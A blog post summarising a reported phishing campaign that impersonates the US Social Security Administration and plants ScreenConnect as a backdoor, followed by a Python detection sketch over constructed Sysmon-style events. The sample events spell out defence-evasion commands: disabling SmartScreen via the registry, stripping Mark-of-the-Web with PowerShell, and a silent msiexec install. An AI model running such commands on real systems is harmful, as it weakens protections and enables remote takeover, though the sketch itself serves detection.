From Hackread:
A new wave of cyberattacks is stalking organisations across the UK, US, Canada, and Northern Ireland. According to the latest research from Forcepoint X-Labs, attackers are impersonating the US Social Security Administration (SSA) to bypass security and take total control of private computers. ...
It starts with an email that looks official but is riddled with red flags, like the fake domain SSA.COM and the misspelling of Statement as “eStatemet.” If a user falls for the bait and opens the attached .cmd script, the computer quietly begins to sabotage its own defences. The X-Labs team’s report noted that the script’s first job is to check for administrator powers using a technique called PowerShell auto-elevation. Once it has control, it kills Windows SmartScreen (the system that usually blocks suspicious apps from running) by modifying the computer’s registry. It also strips away the Mark-of-the-Web, a hidden digital tag Windows uses to identify files from the internet. ...
Once the guards are down, the script performs a silent installation of ConnectWise ScreenConnect. In a normal office, this is a legitimate tool for IT support. However, here, hackers are weaponising it as a Remote Access Trojan (RAT) to maintain a permanent “backdoor” into the network. Researchers noted that the software is hardcoded via a System.config file to call back to a specific server: ...
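The chain quoted above (attachment .cmd, SmartScreen switched off in the registry, Mark-of-the-Web removed, silent ScreenConnect install, client calling home) is what a defender would want to spot in endpoint telemetry. The following is an added detection sketch, written for this post and not taken from Hackread or the Forcepoint X-Labs report. It runs over constructed Sysmon-style events (Event ID 1 process creation, Event ID 13 registry value set) that mimic the described stages. Assumptions not confirmed by the article: the SmartScreen switch is the `HKLM\...\Explorer\SmartScreenEnabled` value set to `Off`; MotW is stripped by deleting the `Zone.Identifier` stream or by setting the `SaveZoneInformation` policy (two common methods, not necessarily the one this script used); the ScreenConnect client runs as `ScreenConnect.ClientService.exe` and receives its relay host in an `h=` launch parameter; all paths, hostnames and the client ID are made up.

```python
import re

# Constructed Sysmon-style events (not real telemetry from this campaign).
# EventID 1 = process creation, EventID 13 = registry value set.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\Downloads\SSA_eStatemet.cmd"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabled",
     "Details": "Off"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -NoProfile -Command Remove-Item -Path C:\Users\alice\Downloads\client.msi -Stream Zone.Identifier"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec /i C:\Users\alice\Downloads\client.msi /qn"},
    {"EventID": 1, "Image": r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4e5f6)\ScreenConnect.ClientService.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4e5f6)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.example.invalid&p=8041"'},
]

# Benign noise: an IT-managed ScreenConnect client with SmartScreen untouched.
BENIGN_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files (x86)\ScreenConnect Client (f6e5d4c3b2a1)\ScreenConnect.ClientService.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (f6e5d4c3b2a1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=support.corp.example&p=8041"'},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

# Registry value that turns SmartScreen off for Explorer (assumed mechanism).
SMARTSCREEN_KEY = r"\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabled"
# Policy that stops Windows writing the Zone.Identifier stream (assumed alternative).
SAVE_ZONE_KEY = r"\Policies\Attachments\SaveZoneInformation"

MOTW_STRIP = re.compile(r"Unblock-File|-Stream\s+Zone\.Identifier", re.I)
SILENT_MSI = re.compile(r"msiexec.*\s/(qn|quiet)\b", re.I)
FROM_DOWNLOADS = re.compile(r"\\Downloads\\", re.I)
SC_CLIENT = re.compile(r"ScreenConnect\.ClientService\.exe", re.I)
SC_RELAY = re.compile(r"[?&]h=([^&\"\s]+)", re.I)   # assumed launch-parameter format
MAIL_CLIENTS = {"outlook.exe"}


def classify(ev):
    """Map one event to a stage of the described chain, or None if it matches nothing."""
    eid = ev.get("EventID")
    if eid == 13:
        target = ev.get("TargetObject", "").lower()
        details = str(ev.get("Details", "")).strip()
        if target.endswith(SMARTSCREEN_KEY.lower()) and details.lower() == "off":
            return "smartscreen_off"
        if target.endswith(SAVE_ZONE_KEY.lower()) and details in ("1", "DWORD (0x00000001)"):
            return "motw_disabled"
        return None
    if eid == 1:
        cmd = ev.get("CommandLine", "")
        image = ev.get("Image", "")
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if SC_CLIENT.search(image):
            return "rat_running"
        if SILENT_MSI.search(cmd) and FROM_DOWNLOADS.search(cmd):
            return "silent_msi_from_downloads"
        if MOTW_STRIP.search(cmd):
            return "motw_strip"
        if parent in MAIL_CLIENTS and re.search(r"\.cmd\b", cmd, re.I):
            return "attachment_cmd"
    return None


def analyze(events):
    """Collect matched stages, pull the relay host if a client is seen, and decide
    whether SmartScreen tampering was followed by a ScreenConnect install or start."""
    stages, relay = [], None
    for ev in events:
        stage = classify(ev)
        if stage and stage not in stages:
            stages.append(stage)
        if stage == "rat_running":
            m = SC_RELAY.search(ev.get("CommandLine", ""))
            if m:
                relay = m.group(1)
    chain = "smartscreen_off" in stages and (
        "rat_running" in stages or "silent_msi_from_downloads" in stages)
    return {"stages": stages, "relay_host": relay, "chain": chain}


if __name__ == "__main__":
    for name, evs in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        print(name, analyze(evs))
```

A lone ScreenConnect client is not evidence of compromise, which is why the verdict requires the SmartScreen registry change to precede it; the relay host extracted from the client's launch parameters is the value to compare against whatever the report lists in System.config.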